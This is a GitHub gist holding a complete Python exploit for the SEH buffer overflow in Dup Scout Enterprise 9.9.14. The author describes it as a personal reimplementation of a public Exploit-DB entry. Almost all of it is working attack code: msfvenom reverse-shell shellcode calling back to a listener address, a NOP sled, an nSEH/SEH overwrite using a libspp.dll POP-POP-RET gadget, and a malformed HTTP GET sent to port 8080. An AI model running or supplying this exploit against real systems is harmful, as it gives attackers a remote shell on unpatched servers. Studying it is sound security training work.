Created
June 17, 2022 19:45
-
-
Save JasonTurley/deb82e4ea718c1884edb921e1f06ad09 to your computer and use it in GitHub Desktop.
Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Dup Scout Enterprise v9.9.14 SEH Overflow | |
# This is my PoC for the previously discovered Dup Scout Enterprise SEH | |
# overflow vuln. | |
# | |
# The original exploit can be viewed here: https://www.exploit-db.com/exploits/42557 | |
import socket | |
from struct import pack | |
import sys | |
if len(sys.argv) != 2: | |
print("Usage: python3 exploit.py <IP_ADDRESS>") | |
sys.exit(1) | |
IP = sys.argv[1] | |
PORT = 8080 | |
SIZE = 5000 # number of bytes to cause SEH overwrite | |
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.190.137 | |
# LPORT=4444 -b "\x00\x09\x0a\x0d\x20" -f python -v shellcode | |
shellcode = b"" | |
shellcode += b"\xbe\xde\xde\xed\x74\xdb\xcd\xd9\x74\x24\xf4" | |
shellcode += b"\x58\x33\xc9\xb1\x52\x83\xc0\x04\x31\x70\x0e" | |
shellcode += b"\x03\xae\xd0\x0f\x81\xb2\x05\x4d\x6a\x4a\xd6" | |
shellcode += b"\x32\xe2\xaf\xe7\x72\x90\xa4\x58\x43\xd2\xe8" | |
shellcode += b"\x54\x28\xb6\x18\xee\x5c\x1f\x2f\x47\xea\x79" | |
shellcode += b"\x1e\x58\x47\xb9\x01\xda\x9a\xee\xe1\xe3\x54" | |
shellcode += b"\xe3\xe0\x24\x88\x0e\xb0\xfd\xc6\xbd\x24\x89" | |
shellcode += b"\x93\x7d\xcf\xc1\x32\x06\x2c\x91\x35\x27\xe3" | |
shellcode += b"\xa9\x6f\xe7\x02\x7d\x04\xae\x1c\x62\x21\x78" | |
shellcode += b"\x97\x50\xdd\x7b\x71\xa9\x1e\xd7\xbc\x05\xed" | |
shellcode += b"\x29\xf9\xa2\x0e\x5c\xf3\xd0\xb3\x67\xc0\xab" | |
shellcode += b"\x6f\xed\xd2\x0c\xfb\x55\x3e\xac\x28\x03\xb5" | |
shellcode += b"\xa2\x85\x47\x91\xa6\x18\x8b\xaa\xd3\x91\x2a" | |
shellcode += b"\x7c\x52\xe1\x08\x58\x3e\xb1\x31\xf9\x9a\x14" | |
shellcode += b"\x4d\x19\x45\xc8\xeb\x52\x68\x1d\x86\x39\xe5" | |
shellcode += b"\xd2\xab\xc1\xf5\x7c\xbb\xb2\xc7\x23\x17\x5c" | |
shellcode += b"\x64\xab\xb1\x9b\x8b\x86\x06\x33\x72\x29\x77" | |
shellcode += b"\x1a\xb1\x7d\x27\x34\x10\xfe\xac\xc4\x9d\x2b" | |
shellcode += b"\x62\x94\x31\x84\xc3\x44\xf2\x74\xac\x8e\xfd" | |
shellcode += b"\xab\xcc\xb1\xd7\xc3\x67\x48\xb0\x2b\xdf\xec" | |
shellcode += b"\xc9\xc4\x22\x10\xdb\x48\xaa\xf6\xb1\x60\xfa" | |
shellcode += b"\xa1\x2d\x18\xa7\x39\xcf\xe5\x7d\x44\xcf\x6e" | |
shellcode += b"\x72\xb9\x9e\x86\xff\xa9\x77\x67\x4a\x93\xde" | |
shellcode += b"\x78\x60\xbb\xbd\xeb\xef\x3b\xcb\x17\xb8\x6c" | |
shellcode += b"\x9c\xe6\xb1\xf8\x30\x50\x68\x1e\xc9\x04\x53" | |
shellcode += b"\x9a\x16\xf5\x5a\x23\xda\x41\x79\x33\x22\x49" | |
shellcode += b"\xc5\x67\xfa\x1c\x93\xd1\xbc\xf6\x55\x8b\x16" | |
shellcode += b"\xa4\x3f\x5b\xee\x86\xff\x1d\xef\xc2\x89\xc1" | |
shellcode += b"\x5e\xbb\xcf\xfe\x6f\x2b\xd8\x87\x8d\xcb\x27" | |
shellcode += b"\x52\x16\xfb\x6d\xfe\x3f\x94\x2b\x6b\x02\xf9" | |
shellcode += b"\xcb\x46\x41\x04\x48\x62\x3a\xf3\x50\x07\x3f" | |
shellcode += b"\xbf\xd6\xf4\x4d\xd0\xb2\xfa\xe2\xd1\x96" | |
# Assemble payload | |
buf = b"\x90" * 20 # Place nop sled and shellcode at beginning of buffer since we run out of stack space | |
buf += shellcode | |
buf += b"A" * (2492 - len(buf)) # Overwrite SEH at 2496 bytes, sub 4 for nSEH | |
buf += b"\xEB\x06\x90\x90" # NSEH: jmp 0x06 | |
buf += b"\xd0\x16\x15\x10" # SEH: 0x101516d0 libspp.dll - pop r32; pop r32; ret | |
buf += b"\xE9\x37\xBF\xFF\xFF" # jmp backwards into nop sled (jmp -0x40c4) | |
buf += b"D" * (SIZE - len(buf)) # padding to trigger crash | |
# Connect to the target | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((IP, PORT)) | |
# Send a malformed get request | |
packet = b"GET /../%s HTTP/1.1\r\n" % buf | |
packet += b"\r\n" | |
print("Sending packet of %d bytes" % len(buf)) | |
s.send(packet) | |
s.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment